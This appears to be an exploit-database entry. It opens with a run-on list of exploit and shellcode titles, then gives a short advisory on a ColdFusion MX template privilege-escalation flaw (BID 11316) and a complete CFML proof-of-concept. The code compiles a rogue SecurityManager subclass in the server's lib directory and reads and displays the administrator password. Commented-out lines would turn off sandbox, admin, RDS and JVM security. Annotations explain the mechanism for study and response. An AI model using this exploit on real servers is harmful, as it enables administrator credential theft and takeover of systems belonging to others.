
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 
bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
source: https://www.securityfocus.com/bid/11316/info
Reportedly, Macromedia ColdFusion MX is affected by a privilege escalation vulnerability when handling templates. This issue is due to an access validation error that allows a user to perform actions with administrator privileges.
An attacker may exploit this issue to gain administrative privileges on a computer running the vulnerable application.
<cfscript>
// Proof-of-concept for the access-validation flaw described above (BID 11316):
// an ordinary CFML template reaches ColdFusion's internal security manager
// through CreateObject("java", ...) and ends up holding an object that exposes
// the administrator settings.
// What it relies on, as visible below: the template is allowed to instantiate
// arbitrary Java classes, and the server process can write into its own lib
// directory. A SecurityExploit.java file (and presumably a compiled class next
// to it) appearing in lib is a direct artefact of this script.
// NOTE(review): restricting CreateObject for untrusted templates, e.g. through
// sandbox settings, would presumably block the first step - confirm against
// the vendor fix for this BID.

// Handles to the Java classes the script drives from CFML.
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
// sun.tools.javac.Main is the legacy javac entry point; it is used below to
// compile inside the server's own JVM.
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");
// Path separator for the host OS. CFML does not treat backslash as an escape
// character, so "\" is a one-character string here.
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
// All four paths sit in <ColdFusion root>/lib: the Java source this script
// creates, the product jar used as the compile classpath, and the two files
// later handed to the security manager constructor.
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
// Create or overwrite the source file (second argument false = do not append).
fileWriter = objFileWriter.init("#strJavaSource#",false);
// The generated class subclasses coldfusion.security.SecurityManager, forwards
// the two File arguments to the parent constructor, and overrides
// isAdminSecurityEnabled() so that it always returns false.
fileWriter.write("import coldfusion.security.SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();
// Compiler arguments are built as one comma-separated string and then split
// into an array: -classpath, the product jar, the generated source file.
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
strArr = str.split(",");
// The byte-array stream is passed to the compiler object as its output stream;
// nothing in this script reads it back.
byteArray = objByteArray.init();
compileObj =objJavaC.init(byteArray,str);
compileObj.compile(strArr);
// Instantiate the freshly compiled subclass by name. Presumably lib is on the
// server class path so that the class resolves - not shown here.
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
// Construct the object over the server's own neo-security.xml and
// password.properties; load() presumably reads them into the object.
obj.init(file1,file2);
obj.load();
</cfscript>
<cfscript>
// obj is the security-manager subclass instance created by the preceding
// <cfscript> block. Every call here is an administrator-level operation made
// from an ordinary template, which is the impact the advisory describes.
// Only the password read is active; the author left the setters commented out.
// For response purposes: on a server where this template has run, treat the
// administrator password as disclosed and review the settings named below.

// Get Administrator Password
strAdminPw = obj.getAdminPassword();
// Set Administrator Password
//obj.setAdminPassword("test123");

// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);

// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);

// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);

// Set RDS Password
//obj.setRdsPassword("test123");

// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);
</cfscript>
<!--- Writes the value of strAdminPw (set by the script block above) into the page returned to the requester. --->
<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>